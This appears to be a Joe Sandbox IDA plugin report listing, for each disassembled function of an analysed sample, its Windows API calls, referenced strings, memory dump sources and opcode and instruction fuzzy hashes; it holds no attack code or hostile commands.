                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93156
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93168
                      • _free.LIBCMT ref: 02F92538
                        • Part of subcall function 02F92096: HeapFree.KERNEL32(00000000,00000000,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?), ref: 02F920AC
                        • Part of subcall function 02F92096: GetLastError.KERNEL32(?,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?,?), ref: 02F920BE
                      • _free.LIBCMT ref: 02F9255A
                      • _free.LIBCMT ref: 02F9256F
                      • _free.LIBCMT ref: 02F9257A
                      • _free.LIBCMT ref: 02F9259C
                      • _free.LIBCMT ref: 02F925AF
                      • _free.LIBCMT ref: 02F925BD
                      • _free.LIBCMT ref: 02F925C8
                      • _free.LIBCMT ref: 02F92600
                      • _free.LIBCMT ref: 02F92607
                      • _free.LIBCMT ref: 02F92624
                      • _free.LIBCMT ref: 02F9263C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 822a09d6865b4949ec39141da7724e6534a183b8786501df204fcce45297260d
                      • Instruction ID: 981001dcefd6b5d75428b6f57874af795cc90a967e54e25382507f17a7b79532
                      • Opcode Fuzzy Hash: 822a09d6865b4949ec39141da7724e6534a183b8786501df204fcce45297260d
                      • Instruction Fuzzy Hash: 5A310671A00305ABFF31AA39DC54B56B3EABB007D5F144469EA9AD6260EF71A980CF10
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 004788D7
                      • CoInitialize.OLE32(00000000), ref: 00478904
                      • CoUninitialize.OLE32 ref: 0047890E
                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                      • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                      • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                      • VariantClear.OLEAUT32(?), ref: 00478C35
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                      • String ID: ,,I
                      • API String ID: 2395222682-4163367948
                      • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                      • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                      • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                      • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 3964851224-909552448
                      • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                      • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                      • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                      • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                      APIs
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                        • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: SendString$_memmove
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2279737902-1007645807
                      • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                      • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                      • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                      • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 208665112-3771769585
                      • Opcode ID: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
                      • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                      • Opcode Fuzzy Hash: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
                      • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                      APIs
                      • timeGetTime.WINMM ref: 00464F7A
                        • Part of subcall function 0042049F: timeGetTime.WINMM(?,76C1B400,00410E7B), ref: 004204A3
                      • Sleep.KERNEL32(0000000A), ref: 00464FA6
                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                      • SetActiveWindow.USER32 ref: 0046500B
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                      • Sleep.KERNEL32(000000FA), ref: 00465043
                      • IsWindow.USER32 ref: 0046504F
                      • EndDialog.USER32(00000000), ref: 00465060
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                      • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                      • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                      • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • CoInitialize.OLE32(00000000), ref: 0046D5EA
                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                      • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                      • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                      • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                      • _memset.LIBCMT ref: 0046D7E1
                      • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                      • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                      • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                      • String ID:
                      • API String ID: 1246142700-0
                      • Opcode ID: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
                      • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                      • Opcode Fuzzy Hash: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
                      • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 0045C283
                      • GetWindowRect.USER32(00000000,?), ref: 0045C295
                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                      • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                      • GetWindowRect.USER32(00000000,?), ref: 0045C310
                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                      • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                      • GetWindowRect.USER32(00000000,?), ref: 0045C383
                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                      • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                      • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                      • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                      • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                      APIs
                        • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                      • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                      • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                      • DeleteObject.GDI32(00000000), ref: 0043BD1C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                      • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                      • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                      • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                      APIs
                        • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                      • GetSysColor.USER32(0000000F), ref: 004021D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                      • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                      • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                      • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                      APIs
                      • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                      • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                      • _wcscpy.LIBCMT ref: 0046A9FF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharDriveLowerType_wcscpy
                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 2820617543-1000479233
                      • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                      • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                      • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                      • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                      APIs
                      • _memset.LIBCMT ref: 0048716A
                      • CreateMenu.USER32 ref: 00487185
                      • SetMenu.USER32(?,00000000), ref: 00487194
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                      • IsMenu.USER32(?), ref: 00487237
                      • CreatePopupMenu.USER32 ref: 00487241
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                      • DrawMenuBar.USER32 ref: 00487276
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                      • String ID: 0$F
                      • API String ID: 176399719-3044882817
                      • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                      • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                      • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                      • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                      APIs
                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                      • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                      • SelectObject.GDI32(00000000,00000000), ref: 00487580
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                      • DeleteDC.GDI32(00000000), ref: 00487594
                      • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                      • String ID: static
                      • API String ID: 2559357485-2160076837
                      • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                      • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                      • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                      • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                      APIs
                      • _memset.LIBCMT ref: 00426E3E
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      • __gmtime64_s.LIBCMT ref: 00426ED7
                      • __gmtime64_s.LIBCMT ref: 00426F0D
                      • __gmtime64_s.LIBCMT ref: 00426F2A
                      • __allrem.LIBCMT ref: 00426F80
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                      • __allrem.LIBCMT ref: 00426FB3
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                      • __allrem.LIBCMT ref: 00426FE8
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                      • __invoke_watson.LIBCMT ref: 00427077
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                      • String ID:
                      • API String ID: 384356119-0
                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                      • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
